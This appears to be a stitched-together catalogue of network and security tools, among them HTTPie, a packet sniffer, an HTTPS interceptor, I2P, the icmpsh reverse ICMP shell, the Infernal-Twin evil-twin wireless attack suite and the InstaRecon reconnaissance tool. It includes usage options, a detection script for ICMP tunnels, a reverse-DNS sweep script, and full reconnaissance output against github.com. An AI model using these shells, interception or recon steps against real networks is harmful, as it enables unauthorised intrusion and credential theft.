$ http [flags] [METHOD] URL [ITEM [ITEM]]

See also http --help.


Examples
Custom HTTP method, HTTP headers and JSON data:
$ http PUT example.org X-API-Token:123 name=John

Submitting forms:
$ http -f POST example.org hello=World

See the request that is being sent using one of the output
options:
$ http -v example.org

Use the GitHub API to post a comment on an issue with authentication:
$ http -a USERNAME POST https://api.github.com/repos/jkbrzt/httpie/issues/83/comments body='HTTPie is awesome!'

Upload a file using redirected input:
$ http example.org < file.json

Download a file and save it via redirected output:
$ http example.org/file > file

Download a file wget style:
$ http --download example.org/file

Use named sessions to make certain aspects of the communication persistent between requests to the same host:
$ http --session=logged-in -a username:password httpbin.org/get API-Key:123
$ http --session=logged-in httpbin.org/headers

Set a custom Host header to work around missing DNS records:
$ http localhost:8000 Host:example.com

What follows is detailed documentation. It covers the command syntax, advanced usage, and also features additional examples.
HTTP Method

The name of the HTTP method comes right before the URL argument:
$ http DELETE example.org/todos/7

Which looks similar to the actual Request-Line that is sent:
DELETE /todos/7 HTTP/1.1

When the METHOD argument is omitted from the command, HTTPie defaults to either GET (with no request data) or POST (with request data).
Request URL

The only information HTTPie needs to perform a request is a URL. The default scheme is, somewhat unsurprisingly, http://, and can be omitted from the argument: http example.org works just fine.
Additionally, curl-like shorthand for localhost is supported. This means that, for example, :3000 would expand to http://localhost:3000. If the port is omitted, then port 80 is assumed.
$ http :/foo
GET /foo HTTP/1.1
Host: localhost
$ http :3000/bar
GET /bar HTTP/1.1
Host: localhost:3000
$ http :
GET / HTTP/1.1
Host: localhost

If you find yourself manually constructing URLs with querystring parameters on the terminal, you may appreciate the param==value syntax for appending URL parameters so that you don't have to worry about escaping the & separators. To search for HTTPie on Google Images you could use this command:
$ http GET www.google.com search==HTTPie tbm==isch
GET /?search=HTTPie&tbm=isch HTTP/1.1

Download HTTPie
HTTPNETWORKSNIFFER V1.50 - PACKET SNIFFER TOOL
THAT CAPTURES ALL HTTP REQUESTS/RESPONSES

HTTPNetworkSniffer is a packet sniffer tool that captures all HTTP requests/responses sent between the Web browser and the Web server and displays them in a simple table. For every HTTP request, the following information is displayed: Host Name, HTTP method (GET, POST, HEAD), URL Path, User Agent, Response Code, Response String, Content Type, Referer, Content Encoding, Transfer Encoding, Server Name, Content Length, Cookie String, and more...

You can easily select one or more HTTP information lines, and
then export them to text/html/xml/csv file or copy them to the
clipboard and then paste them into Excel.
System Requirements

This utility works on any version of Windows, starting from Windows 2000 and up to Windows 10, including 64-bit systems.
One of the following capture drivers is required to use
HTTPNetworkSniffer:
WinPcap Capture Driver: WinPcap is an open source
capture driver that allows you to capture network
packets on any version of Windows. You can
download and install the WinPcap driver from this
Web page.
Microsoft Network Monitor Driver version 2.x (Only
for Windows 2000/XP/2003): Microsoft provides a
free capture driver under Windows 2000/XP/2003
that can be used by HTTPNetworkSniffer, but this
driver is not installed by default, and you have to
manually install it, by using one of the following
options:
Option 1: Install it from the CD-ROM of
Windows 2000/XP according to the instructions
in Microsoft Web site
Option 2 (XP Only) : Download and install the
Windows XP Service Pack 2 Support Tools.
One of the tools in this package is netcap.exe.
When you run this tool in the first time, the
Network Monitor Driver will automatically be
installed on your system.
Microsoft Network Monitor Driver version 3.x:
Microsoft provides a new version of Microsoft
Network Monitor driver (3.x) that is also supported
under Windows 7/Vista/2008.
The new version of Microsoft Network Monitor (3.x) is available to download from Microsoft Web site.

You can also try to use HTTPNetworkSniffer without installing any driver, by using the 'Raw Sockets' method. Unfortunately, Raw Sockets method has many problems:
It doesn't work in all Windows systems, depending on Windows version, service pack, and the updates installed on your system.
On Windows 7 with UAC turned on, 'Raw Sockets' method only works when you run HTTPNetworkSniffer with 'Run As Administrator'.

Start Using HTTPNetworkSniffer

Except for the capture driver needed for capturing network packets, HTTPNetworkSniffer doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - HTTPNetworkSniffer.exe
After running HTTPNetworkSniffer for the first time, the 'Capture Options' window appears on the screen, and you're requested to choose the capture method and the desired network adapter. The next time you use HTTPNetworkSniffer, it'll automatically start capturing packets with the capture method and the network adapter that you previously selected. You can always change the 'Capture Options' again by pressing F9.
After choosing the capture method and network adapter, HTTPNetworkSniffer captures and displays every HTTP request/response sent between your Web browser and the remote Web server.
Command-Line Options

/load_file_pcap <Filename>      Loads the specified capture file, created by WinPcap driver.
/load_file_netmon <Filename>    Loads the specified capture file, created by Network Monitor driver 3.x.

Download HTTPNetworkSniffer v1.50
HYPERFOX - HTTP AND HTTPS TRAFFIC INTERCEPTOR

Hyperfox is a security tool for proxying and recording HTTP and HTTPs communications on a LAN.
Hyperfox is capable of forging SSL certificates on the fly using a root CA certificate and its corresponding key (both provided by the user). If the target machine recognizes the root CA as trusted, then HTTPs traffic can be successfully intercepted and recorded.
Hyperfox saves captured data to a SQLite database for later inspection and also provides a web interface for watching live traffic and downloading wire formatted messages.

Download Hyperfox
I2P - THE INVISIBLE INTERNET PROJECT

I2P is an anonymous network, exposing a simple layer that applications can use to anonymously and securely send messages to each other. The network itself is strictly message based (a la IP), but there is a library available to allow reliable streaming communication on top of it (a la TCP). All communication is end to end encrypted (in total there are four layers of encryption used when sending a message), and even the end points ("destinations") are cryptographic identifiers (essentially a pair of public keys).
How does it work?

To anonymize the messages sent, each client application has their I2P "router" build a few inbound and outbound "tunnels" - a sequence of peers that pass messages in one direction (to and from the client, respectively). In turn, when a client wants to send a message to another client, the client passes that message out one of their outbound tunnels targeting one of the other client's inbound tunnels, eventually reaching the destination. Every participant in the network chooses the length of these tunnels, and in doing so, makes a tradeoff between anonymity, latency, and throughput according to their own needs. The result is that the number of peers relaying each end to end message is the absolute minimum necessary to meet both the sender's and the receiver's threat model.
The first time a client wants to contact another client, they make
a query against the fully distributed "network database" - a
custom structured distributed hash table (DHT) based off the
Kademlia algorithm. This is done to find the other client's
inbound tunnels efficiently, but subsequent messages between
them usually includes that data so no further network database
lookups are required.
What can you do with it?

Within the I2P network, applications are not restricted in how they can communicate - those that typically use UDP can make use of the base I2P functionality, and those that typically use TCP can use the TCP-like streaming library. We have a generic TCP/I2P bridge application ("I2PTunnel") that enables people to forward TCP streams into the I2P network as well as to receive streams out of the network and forward them towards a specific TCP/IP address.
I2PTunnel is currently used to let people run their own anonymous website ("eepsite") by running a normal webserver and pointing an I2PTunnel 'server' at it, which people can access anonymously over I2P with a normal web browser by running an I2PTunnel HTTP proxy ("eepproxy"). In addition, we use the same technique to run an anonymous IRC network (where the IRC server is hosted anonymously, and standard IRC clients use an I2PTunnel to contact it). There are other application development efforts going on as well, such as one to build an optimized swarming file transfer application (a la BitTorrent), a distributed data store (a la Freenet / MNet), and a blogging system (a fully distributed LiveJournal), but those are not ready for use yet.
I2P is not inherently an "outproxy" network - the client you send
a message to is the cryptographic identifier, not some IP
address, so the message must be addressed to someone
running I2P. However, it is possible for that client to be an
outproxy, allowing you to anonymously make use of their
Internet connection. To demonstrate this, the "eepproxy" will
accept normal non-I2P URLs (e.g. "http://www.i2p.net") and
forward them to a specific destination that runs a squid HTTP
proxy, allowing simple anonymous browsing of the normal web.
Simple outproxies like that are not viable in the long run for
several reasons (including the cost of running one as well as
the anonymity and security issues they introduce), but in certain
circumstances the technique could be appropriate.
The I2P development team is an open group, welcome to all
who are interested in getting involved, and all of the code is
open source. The core I2P SDK and the current router
implementation is done in Java (currently working with both sun
and kaffe, gcj support planned for later), and there is a simple
socket based API for accessing the network from other
languages (with a C library available, and both Python and Perl
in development). The network is actively being developed and
has not yet reached the 1.0 release, but the current roadmap
describes our schedule.

Download I2P
ICMPSH - SIMPLE REVERSE ICMP SHELL

Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly! Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios, when you have owned a machine that is part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to mention a bind shell.
However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus of this tool.
Description

icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python. The main advantage over the other similar open source tools is that it does not require administrative privileges to run onto the target machine.
The tool is clean, easy and portable. The slave (client) runs on the target Windows machine, it is written in C and works on Windows only whereas the master (server) can run on any platform on the attacker machine as it has been implemented in C and Perl.
Features

Open source software - primarily coded by Nico, forked by me.
Client/server architecture.
The master is portable across any platform that can run either C, Perl or Python code.
The target system has to be Windows because the slave runs on that platform only for now.
The user running the slave on the target system does not require administrative privileges.

Usage

Running the master

The master is straightforward to use. There are no extra libraries required for the C and Python versions. The Perl master however has the following dependencies:
IO::Socket
NetPacket::IP
NetPacket::ICMP
When running the master, don't forget to disable ICMP replies by the OS. For example:
sysctl -w net.ipv4.icmp_echo_ignore_all=1

If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive commands sent from the master.
Running the slave
The slave comes with a few command line options as outlined below:
-t host            host ip address to send ping requests to. This option is mandatory!
-r                 send a single test icmp request containing the string "Test1234" and then quit. This is for testing the connection.
-d milliseconds    delay between requests in milliseconds
-o milliseconds    timeout of responses in milliseconds. If a response has not been received in time, the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. The counter is set back to 0 if a response was received.
-b num             limit of blanks (unanswered icmp requests) before quitting
-s bytes           maximal data buffer size in bytes
In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.
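Seen from the defending network, the channel described above has a recognisable shape: echo requests whose data is not the standard ping fill, payload sizes that change from request to request, and a steady stream of requests from one host to one peer (the -d delay and -s buffer size set that cadence). The following Python is an added example, not part of the icmpsh project; it scores a constructed set of ICMP echo records against those traits. The records, the fill-pattern heuristics and the alert thresholds are assumptions of this example, and the "Test1234" string is the one the -r option sends.

```python
"""Detection-side view of ICMP tunnelling such as icmpsh (added example, not
part of the icmpsh project). It scores ICMP echo-request records for traits
a data-carrying channel shows: payloads that are not a standard ping fill,
varying payload sizes, and repeated requests between one pair of hosts."""
from collections import defaultdict

ECHO_REQUEST = 8

# Standard ping fills (heuristic, constructed from the common ping clients):
# 64-bit Linux ping sends a 16-byte timeval followed by the bytes 0x10..0x37,
# Windows ping sends a fixed 32-byte alphabetic fill.
LINUX_FILL = bytes(range(0x10, 0x38))
WINDOWS_FILL = b"abcdefghijklmnopqrstuvwabcdefghi"


def looks_like_ping(payload):
    """True when the echo payload matches one of the known ping fill patterns."""
    if payload == WINDOWS_FILL:
        return True
    # Linux: skip the 16-byte timestamp, the rest must be a prefix of the fill.
    return len(payload) > 16 and LINUX_FILL.startswith(payload[16:])


def analyze(records, min_suspicious=3):
    """Return a list of (src, dst, reason) alerts for suspicious echo flows.

    records: iterable of dicts with keys src, dst, type, payload (bytes).
    min_suspicious: how many non-ping payloads, or distinct payload sizes,
    one (src, dst) flow needs before it is reported (threshold is an assumption).
    """
    flows = defaultdict(lambda: {"requests": 0, "non_ping": 0, "sizes": set()})
    for rec in records:
        if rec["type"] != ECHO_REQUEST:
            continue            # replies are judged by the request that caused them
        flow = flows[(rec["src"], rec["dst"])]
        flow["requests"] += 1
        flow["sizes"].add(len(rec["payload"]))
        if not looks_like_ping(rec["payload"]):
            flow["non_ping"] += 1

    alerts = []
    for (src, dst), flow in flows.items():
        if flow["non_ping"] >= min_suspicious:
            alerts.append((src, dst, "non-ping payloads in echo requests"))
        if len(flow["sizes"]) >= min_suspicious:
            alerts.append((src, dst, "variable echo payload size"))
    return alerts


def echo(src, dst, payload):
    """Build one constructed echo-request record."""
    return {"src": src, "dst": dst, "type": ECHO_REQUEST, "payload": payload}


# Constructed sample traffic (addresses and payloads are made up for the example).
SAMPLE_RECORDS = [
    # 10.0.0.6 pinging its gateway from a Linux box: timestamp + standard fill.
    echo("10.0.0.6", "10.0.0.1", bytes(16) + LINUX_FILL),
    echo("10.0.0.6", "10.0.0.1", bytes(16) + LINUX_FILL),
    echo("10.0.0.6", "10.0.0.1", bytes(16) + LINUX_FILL),
    # 10.0.0.7 pinging from Windows.
    echo("10.0.0.7", "10.0.0.1", WINDOWS_FILL),
    # 10.0.0.5 sending free-form data of changing length to one external peer.
    echo("10.0.0.5", "203.0.113.7", b"Test1234"),
    echo("10.0.0.5", "203.0.113.7", b""),
    echo("10.0.0.5", "203.0.113.7", b"hostname output line\n"),
    echo("10.0.0.5", "203.0.113.7", b"ready"),
]


if __name__ == "__main__":
    for src, dst, reason in analyze(SAMPLE_RECORDS):
        print("ALERT %s -> %s: %s" % (src, dst, reason))
```

Only the 10.0.0.5 flow trips both rules; the ordinary pings do not. On a real network the records would come from a capture (the payload of each ICMP echo), and the same heuristics belong in an IDS rule alongside the simpler control the text itself implies: if hosts in the DMZ have no business sending echo requests outbound, filter ICMP at the egress point as well as TCP and UDP.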

Download icmpsh
INFERNAL-TWIN - THIS IS EVIL TWIN ATTACK
AUTOMATED (WIRELESS HACKING)

This tool is created to aid the penetration testers in assessing wireless security. Author is not responsible for misuse. Please read instructions thoroughly.
Usage
sudo python InfernalWireless.py

How to install
$ sudo apt-get install apache2
$ sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql
$ sudo apt-get install python-scapy
$ sudo apt-get install python-wxtools
$ sudo apt-get install python-mysqldb
$ sudo apt-get install aircrack-ng
$ git clone https://github.com/entropy1337/infernal-twin.git
$ cd infernal-twin

$ python db_connect_creds.py
dbconnect.conf doesn't exists or creds are incorrect
*************** creating DB config file ************
Enter the DB username: root
Enter the password: *************
trying to connect
username root

FAQ:
I have a problem with connecting to the Database

Solution:
(Thanks to @lightos for this fix)
There seem to be few issues with Database connectivity. The
solution is to create a new user on the database and use that
user for launching the tool. Follow the following steps.
1. Delete dbconnect.conf file from the Infernalwireless folder

2. Run the following command from your mysql console.


mysql> use mysql;
mysql> CREATE USER 'root2'@'localhost' IDENTIFIED BY 'enter the new password here';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'root2'@'localhost' WITH GRANT OPTION;

3. Try to run the tool again.

Release Notes:
New Features:
GUI Wireless security assessment Suite
Implemented
WPA2 hacking
WEP Hacking
WPA2 Enterprise hacking
Wireless Social Engineering
SSL Strip
Report generation
PDF Report
HTML Report
Note taking function
Data is saved into Database
Network mapping
MiTM
Probe Request

Changes:
Improved compatibility
Report improvement
Better NAT Rules

Bug Fixes:
Wireless Evil Access Point traffic redirect
Fixed WPA2 Cracking
Fixed Infernal Wireless
Fixed Free AP
Check for requirements
DB implementation via config file
Improved Catch and error
Check for requirements
Works with Kali 2

Coming Soon:
Parsing t-shark log files for gathering creds and more
More attacks.

Expected bugs:
Wireless card might not be supported
Window might crash
Freeze

A lot of work to be done, but this tool is still being developed.

Download Infernal-Twin
INSTANT PDF PASSWORD PROTECTOR - PASSWORD
PROTECT PDF FILE

Instant PDF Password Protector is the Free tool to quickly Password Protect PDF file on your system.
With a click of button, you can lock or protect any of your sensitive/private PDF documents. You can also use any of the standard Encryption methods - RC4/AES (40-bit, 128-bit, 256-bit) based upon the desired security level.
In addition to this, it also helps you set advanced restrictions to prevent Printing, Copying or Modification of target PDF file.
To further secure it, you can also set 'Owner Password' (also called Permissions Password) to stop anyone from removing these restrictions.
'PDF Password Protector' includes Installer for quick installation/un-installation. It works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.
Features

Instantly Password Protect PDF document with a click of button
Supports all versions of PDF documents
Lock PDF file with Password (User/Document Open Password)
Supports all the standard Encryption methods - RC4/AES (40-bit, 128-bit, 256-bit)
[Advanced] Protect PDF file by adding following Restrictions
Copying
Printing
Signing
Commenting
Changing the Document
Document Assembly
Page Extraction
Filling of Form Fields
[Advanced] Set the Permission Password (Owner Password) to prevent removal of above restrictions
Advanced Settings Dialog to quickly alter above permissions/restrictions
Drag & Drop support for easier selection of PDF file
Very easy to use with simple & attractive GUI screen
Support for local Installation and uninstallation of the software

Download Instant PDF Password Protector


INSTARECON - AUTOMATED DIGITAL RECONNAISSANCE

Automated basic digital reconnaissance. Great for getting an initial footprint of your targets and discovering additional subdomains. InstaRecon will do:
DNS (direct, PTR, MX, NS) lookups
Whois (domains and IP) lookups
Google dorks in search of subdomains
Shodan lookups
Reverse DNS lookups on entire CIDRs
...all printed nicely on your console or to a CSV file.
InstaRecon will never scan a target directly. Information is retrieved from DNS/Whois servers, Google, and Shodan. Passive does not mean invisible, though: forward and PTR queries are still forwarded by your recursive resolver to the authoritative name servers, so a reverse sweep of a whole /22 produces a burst of PTR queries that the netblock owner (or its ISP) can see in its logs.
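The reverse DNS sweep over a CIDR is the step that surfaces neighbours outside the target's own zone (the github.net mail relays in the sample output are an example). The following is an added example, not InstaRecon's code: it implements that sweep in Python with a pluggable PTR lookup so it can run offline against a handful of PTR answers copied from the page's output (a constructed stand-in for the live resolver), walks every address in the block rather than only the host range, separates hits by whether they fall under the target domain, and renders the same CSV shape. Function and variable names (reverse_sweep, group_by_zone, SAMPLE_PTRS) are the example's own.

```python
import csv
import io
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, Optional

PtrLookup = Callable[[str], Optional[str]]   # ip -> hostname, or None when no PTR

# Constructed offline stand-in, values copied from the page's github.com sweep.
SAMPLE_PTRS: Dict[str, str] = {
    "192.30.252.128": "github.com",
    "192.30.252.130": "github.com",
    "192.30.252.132": "assets.github.com",
    "192.30.252.136": "api.github.com",
    "192.30.252.192": "github-smtp2-ext1.iad.github.net",
}


def system_ptr_lookup(ip: str) -> Optional[str]:
    """Live PTR lookup through the operating system's resolver."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror, OSError):
        return None


def reverse_sweep(cidr: str, lookup: PtrLookup = system_ptr_lookup,
                  workers: int = 32) -> Dict[str, str]:
    """Return {ip: hostname} for every address in cidr that has a PTR record.
    Every address is queried, not only net.hosts(): the network and
    broadcast addresses of a block can carry PTR records too."""
    net = ipaddress.ip_network(cidr, strict=False)
    addrs = [str(a) for a in net]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        names = list(pool.map(lookup, addrs))
    return {ip: name for ip, name in zip(addrs, names) if name}


def group_by_zone(results: Dict[str, str], target_domain: str) -> Dict[str, Dict[str, str]]:
    """Split hits into names under target_domain and everything else.
    On a hosting or transit netblock the second group is often another
    customer and must be excluded from scope."""
    target = target_domain.lower().strip(".")
    suffix = "." + target
    inside, outside = {}, {}
    for ip, name in results.items():
        n = name.lower().rstrip(".")
        (inside if n == target or n.endswith(suffix) else outside)[ip] = name
    return {"in_scope": inside, "out_of_scope": outside}


def to_csv(results: Dict[str, str]) -> str:
    """Render the sweep as 'ip,hostname' rows sorted by address."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["ip", "hostname"])
    for ip in sorted(results, key=ipaddress.ip_address):
        writer.writerow([ip, results[ip]])
    return buf.getvalue()


if __name__ == "__main__":
    # Offline demonstration; swap SAMPLE_PTRS.get for system_ptr_lookup to go live.
    hits = reverse_sweep("192.30.252.128/25", lookup=SAMPLE_PTRS.get)
    print(to_csv(hits))
    for zone, names in group_by_zone(hits, "github.com").items():
        print(zone, names)
```

Pass `lookup=system_ptr_lookup` (the default) for a real sweep; the thread pool keeps a /22 (1024 PTR queries) to a few seconds, which is also why the burst is easy to spot on the authoritative side.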
Installing with pip

Simply install the dependencies using pip. Tested on Ubuntu 14.04 and Kali Linux 1.1.0a.
pip install -r requirements.txt

or
pip install pythonwhois ipwhois ipaddress shodan

Example
$ ./instarecon.py -s <shodan_key> -o ~/Desktop/github.com.csv github.com
# InstaRecon v0.1 - by Luis Teixeira (teix.co)
# Scanning 1/1 hosts
# Shodan key provided - <shodan_key>
# ____________________ Scanning github.com
____________________ #
# DNS lookups
[*] Domain: github.com
[*] IPs & reverse DNS:
192.30.252.130 - github.com
[*] NS records:
ns4.p16.dynect.net
204.13.251.16 - ns4.p16.dynect.net
ns3.p16.dynect.net
208.78.71.16 - ns3.p16.dynect.net
ns2.p16.dynect.net
204.13.250.16 - ns2.p16.dynect.net
ns1.p16.dynect.net
208.78.70.16 - ns1.p16.dynect.net
[*] MX records:
ALT2.ASPMX.L.GOOGLE.com
173.194.64.27 - oa-in-f27.1e100.net
ASPMX.L.GOOGLE.com
74.125.203.26
ALT3.ASPMX.L.GOOGLE.com
64.233.177.26
ALT4.ASPMX.L.GOOGLE.com
173.194.219.27
ALT1.ASPMX.L.GOOGLE.com
74.125.25.26 - pa-in-f26.1e100.net
# Whois lookups
[*] Whois domain:
Domain Name: github.com
Registry Domain ID: 1264983250_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2015-01-08T04:00:18-0800
Creation Date: 2007-10-09T11:20:50-0700
Registrar Registration Expiration Date:
2020-10-09T11:20:50-0700
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email:
abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895740
Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)
Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)
Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)
Registry Registrant ID:
Registrant Name: GitHub Hostmaster
Registrant Organization: GitHub, Inc.
Registrant Street: 88 Colin P Kelly Jr St,
Registrant City: San Francisco
Registrant State/Province: CA
Registrant Postal Code: 94107
Registrant Country: US
Registrant Phone: +1.4157354488
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: hostmaster@github.com
Registry Admin ID:
Admin Name: GitHub Hostmaster
Admin Organization: GitHub, Inc.
Admin Street: 88 Colin P Kelly Jr St,
Admin City: San Francisco
Admin State/Province: CA
Admin Postal Code: 94107
Admin Country: US
Admin Phone: +1.4157354488
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: hostmaster@github.com
Registry Tech ID:
Tech Name: GitHub Hostmaster
Tech Organization: GitHub, Inc.
Tech Street: 88 Colin P Kelly Jr St,
Tech City: San Francisco
Tech State/Province: CA
Tech Postal Code: 94107
Tech Country: US
Tech Phone: +1.4157354488
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: hostmaster@github.com
Name Server: ns1.p16.dynect.net
Name Server: ns2.p16.dynect.net
Name Server: ns4.p16.dynect.net
Name Server: ns3.p16.dynect.net
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System:
http://wdprs.internic.net/
>>> Last update of WHOIS database:
2015-05-04T06:48:47-0700
[*] Whois IP:
asn: 36459
asn_cidr: 192.30.252.0/24
asn_country_code: US
asn_date: 2012-11-15
asn_registry: arin
net 0:
cidr: 192.30.252.0/22
range: 192.30.252.0 - 192.30.255.255
name: GITHUB-NET4-1
description: GitHub, Inc.
handle: NET-192-30-252-0-1
address: 88 Colin P Kelly Jr Street
city: San Francisco
state: CA
postal_code: 94107
country: US
abuse_emails: abuse@github.com
tech_emails: hostmaster@github.com
created: 2012-11-15 00:00:00
updated: 2013-01-05 00:00:00
# Querying Shodan for open ports
[*] Shodan:
IP: 192.30.252.130
Organization: GitHub
ISP: GitHub
Port: 22
Banner: SSH-2.0-libssh-0.6.0
Key type: ssh-rsa
Key: AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa+PXYPCPy6rbTrTtw7PHkccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJizHhbn2mUjvSAHQqZETYP81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf+Se8xhHTvKSCZIFImWwoG6mbUoWf9nzpIoaSjB+weqqUUmpaaasXVal72J+UX2B+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lGHSZXy28G3skua2SmVi/w4yCE6gbODqnTWlg7+wC604ydGXA8VJiS5ap43JXiUFFAaQ==
Fingerprint: 16:27:ac:a5:76:28:2d:36:63:1b:56:4d:eb:df:a6:48
Port: 80
Banner: HTTP/1.1 301 Moved Permanently
Content-length: 0
Location: https://192.30.252.130/
Connection: close
# Querying Google for subdomains and Linkedin pages, this
might take a while
[*] Possible LinkedIn page: https://au.linkedin.com/
company/github
[*] Subdomains:
blueimp.github.com
199.27.75.133
bounty.github.com
199.27.75.133
designmodo.github.com
199.27.75.133
developer.github.com
199.27.75.133
digitaloxford.github.com
199.27.75.133
documentcloud.github.com
199.27.75.133
education.github.com
50.19.229.116 ec2-50-19-229-116.compute-1.amazonaws.com
50.17.253.231 ec2-50-17-253-231.compute-1.amazonaws.com
54.221.249.148 ec2-54-221-249-148.compute-1.amazonaws.com
enterprise.github.com
54.243.192.65 ec2-54-243-192-65.compute-1.amazonaws.com
54.243.49.169 ec2-54-243-49-169.compute-1.amazonaws.com
erkie.github.com
199.27.75.133
eternicode.github.com
199.27.75.133
facebook.github.com
199.27.75.133
fortawesome.github.com
199.27.75.133
gist.github.com
192.30.252.141 - gist.github.com
guides.github.com
199.27.75.133
h5bp.github.com
199.27.75.133
harvesthq.github.com
199.27.75.133
help.github.com
199.27.75.133
hexchat.github.com
199.27.75.133
hubot.github.com
199.27.75.133
ipython.github.com
199.27.75.133
janpaepke.github.com
199.27.75.133
jgilfelt.github.com
199.27.75.133
jobs.github.com
54.163.15.207 ec2-54-163-15-207.compute-1.amazonaws.com
kangax.github.com
199.27.75.133
karlseguin.github.com
199.27.75.133
kouphax.github.com
199.27.75.133
learnboost.github.com
199.27.75.133
liferay.github.com
199.27.75.133
lloyd.github.com
199.27.75.133
mac.github.com
199.27.75.133
mapbox.github.com
199.27.75.133
matplotlib.github.com
199.27.75.133
mbostock.github.com
199.27.75.133
mdo.github.com
199.27.75.133
mindmup.github.com
199.27.75.133
mrdoob.github.com
199.27.75.133
msysgit.github.com
199.27.75.133
nativescript.github.com
199.27.75.133
necolas.github.com
199.27.75.133
nodeca.github.com
199.27.75.133
onedrive.github.com
199.27.75.133
pages.github.com
199.27.75.133
panrafal.github.com
199.27.75.133
parquet.github.com
199.27.75.133
pnts.github.com
199.27.75.133
raw.github.com
199.27.75.133
rg3.github.com
199.27.75.133
rosedu.github.com
199.27.75.133
schacon.github.com
199.27.75.133
scottjehl.github.com
199.27.75.133
shop.github.com
192.30.252.129 - github.com
shopify.github.com
199.27.75.133
status.github.com
184.73.218.119 ec2-184-73-218-119.compute-1.amazonaws.com
107.20.225.214 ec2-107-20-225-214.compute-1.amazonaws.com
thoughtbot.github.com
199.27.75.133
tomchristie.github.com
199.27.75.133
training.github.com
199.27.75.133
try.github.com
199.27.75.133
twbs.github.com
199.27.75.133
twitter.github.com
199.27.75.133
visualstudio.github.com
54.192.134.13 server-54-192-134-13.syd1.r.cloudfront.net
54.230.135.112 server-54-230-135-112.syd1.r.cloudfront.net
54.192.134.21 server-54-192-134-21.syd1.r.cloudfront.net
54.230.134.194 server-54-230-134-194.syd1.r.cloudfront.net
54.192.133.169 server-54-192-133-169.syd1.r.cloudfront.net
54.192.133.193 server-54-192-133-193.syd1.r.cloudfront.net
54.230.134.145 server-54-230-134-145.syd1.r.cloudfront.net
54.240.176.208 server-54-240-176-208.syd1.r.cloudfront.net
wagerfield.github.com
199.27.75.133
webcomponents.github.com
199.27.75.133
webpack.github.com
199.27.75.133
weheart.github.com
199.27.75.133
# Reverse DNS lookup on range 192.30.252.0/22
192.30.252.80 - ns1.github.com
192.30.252.81 - ns2.github.com
192.30.252.86 - live.github.com
192.30.252.87 - live.github.com
192.30.252.88 - live.github.com
192.30.252.97 - ops-lb-ip1.iad.github.com
192.30.252.98 - ops-lb-ip2.iad.github.com
192.30.252.128 - github.com
192.30.252.129 - github.com
192.30.252.130 - github.com
192.30.252.131 - github.com
192.30.252.132 - assets.github.com
192.30.252.133 - assets.github.com
192.30.252.134 - assets.github.com
192.30.252.135 - assets.github.com
192.30.252.136 - api.github.com
192.30.252.137 - api.github.com
192.30.252.138 - api.github.com
192.30.252.139 - api.github.com
192.30.252.140 - gist.github.com
192.30.252.141 - gist.github.com
192.30.252.142 - gist.github.com
192.30.252.143 - gist.github.com
192.30.252.144 - codeload.github.com
192.30.252.145 - codeload.github.com
192.30.252.146 - codeload.github.com
192.30.252.147 - codeload.github.com
192.30.252.148 - ssh.github.com
192.30.252.149 - ssh.github.com
192.30.252.150 - ssh.github.com
192.30.252.151 - ssh.github.com
192.30.252.152 - pages.github.com
192.30.252.153 - pages.github.com
192.30.252.154 - pages.github.com
192.30.252.155 - pages.github.com
192.30.252.156 - githubusercontent.github.com
192.30.252.157 - githubusercontent.github.com
192.30.252.158 - githubusercontent.github.com
192.30.252.159 - githubusercontent.github.com
192.30.252.192 - github-smtp2-ext1.iad.github.net
192.30.252.193 - github-smtp2-ext2.iad.github.net
192.30.252.194 - github-smtp2-ext3.iad.github.net
192.30.252.195 - github-smtp2-ext4.iad.github.net
192.30.252.196 - github-smtp2-ext5.iad.github.net
192.30.252.197 - github-smtp2-ext6.iad.github.net
192.30.252.198 - github-smtp2-ext7.iad.github.net
192.30.252.199 - github-smtp2-ext8.iad.github.net
192.30.253.1 - ops-puppetmaster1-cp1-prd.iad.github.com
192.30.253.2 - janky-nix101-cp1-prd.iad.github.com
192.30.253.3 - janky-nix102-cp1-prd.iad.github.com
192.30.253.4 - janky-nix103-cp1-prd.iad.github.com
192.30.253.5 - janky-nix104-cp1-prd.iad.github.com
192.30.253.6 - janky-nix105-cp1-prd.iad.github.com
192.30.253.7 - janky-nix106-cp1-prd.iad.github.com
192.30.253.8 - janky-nix107-cp1-prd.iad.github.com
192.30.253.9 - janky-nix108-cp1-prd.iad.github.com
192.30.253.10 - gw.internaltools-esx1-cp1-prd.iad.github.com
